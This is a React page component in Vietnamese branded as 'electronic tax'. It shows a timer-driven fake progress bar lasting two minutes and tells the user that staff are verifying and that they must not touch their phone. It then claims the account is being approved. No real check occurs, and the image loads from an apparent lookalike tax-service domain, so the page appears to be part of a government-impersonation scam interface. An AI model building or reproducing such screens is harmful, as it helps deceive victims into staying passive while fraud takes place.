import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { CheckCircle } from 'lucide-react'; // Dùng biểu tượng dấu tích xanh

const LoadingPage = () => {
  const navigate = useNavigate();
  const [progress, setProgress] = useState(1);
  const [isCompleted, setIsCompleted] = useState(false);
  const [showModal, setShowModal] = useState(false); // Trạng thái hiển thị popup

  useEffect(() => {
    const interval = setInterval(() => {
      setProgress(prev => {
        if (prev >= 100) {
          clearInterval(interval);
          setIsCompleted(true); // Tiến trình hoàn thành
          setShowModal(true); // Mở popup khi tiến trình hoàn thành
          return 100;
        }
        return prev + 1;
      });
    }, 1200); // Cập nhật mỗi 1200ms để chạy từ 1% đến 100% trong 2 phút

    return () => clearInterval(interval);
  }, []);

  const handleHomeRedirect = () => {
    navigate('/home'); // Điều hướng tới trang chủ
  };

  return (
    <div className="min-h-screen bg-[#f8341e] flex flex-col items-center justify-center px-6 text-white">
      <button 
        onClick={() => navigate('/profile')}
        className="text-2xl font-bold mb-12 tracking-wide hover:opacity-80 transition-opacity"
      >
        Thuế điện tử
      </button>

      <div className="mb-12">
        <div className="w-48 h-48 rounded-full flex items-center justify-center">
          <div className="w-40 h-40 rounded-full flex items-center justify-center">
            <img 
              src="https://dangkythuedientu.com/img/loading.42dd77aa.gif" 
              alt="Thuế Điện Tử" 
              className="w-38 h-38 opacity-90"
            />
          </div>
        </div>
      </div>

      {/* Thanh tiến trình */}
      <div className="w-full max-w-sm mb-4">
        <div className="h-3 bg-white/30 rounded-full overflow-hidden">
          <div 
            className="h-full bg-white transition-all duration-300 ease-out" 
            style={{ width: `${progress}%` }}
          />
        </div>
      </div>

      <p className="text-lg font-bold mb-2">{progress}%</p>
       <p className="text-center text-[18px] font-bold px-4">
        Nhân viên đang xác thực vui lòng không thao tác trên điện thoại
      </p>

      {/* Hiển thị thông báo khi tiến trình hoàn thành */}
      {isCompleted && !showModal && (
        <p className="text-center text-[18px] font-bold px-4">
          Nhân viên đang xác thực vui lòng không thao tác trên điện thoại
        </p>
      )}

      {/* Popup modal khi tiến trình hoàn thành */}
      {showModal && (
        <div className="fixed inset-0 z-50 flex items-center justify-center px-6 bg-black/50">
          <div className="relative w-full max-w-sm bg-[#1a1a1a] border border-white/10 rounded-3xl p-8 shadow-2xl animate-in fade-in zoom-in duration-300">
            {/* Dấu tích xanh */}
            <div className="absolute -top-24 -right-24 w-48 h-48 bg-green-600/10 rounded-full blur-3xl" />
            <div className="flex justify-center mb-4">
              <CheckCircle size={48} className="text-green-500" />
            </div>
            <h3 className="text-xl font-bold text-white text-center mb-2">Tài khoản đang được phê duyệt</h3>
            <p className="text-white/50 text-center text-sm mb-8">Vui lòng chờ trong giây lát.</p>
            
            {/* Nút quay lại trang chủ */}
            <div className="flex justify-center">
              <button
                onClick={handleHomeRedirect}
                className="w-3/4 h-12 rounded-full bg-red-600 text-white font-bold hover:bg-red-700 transition-all"
              >
                Về trang chủ
              </button>
            </div>
          </div>
        </div>
      )}
    </div>
  );
};

export default LoadingPage;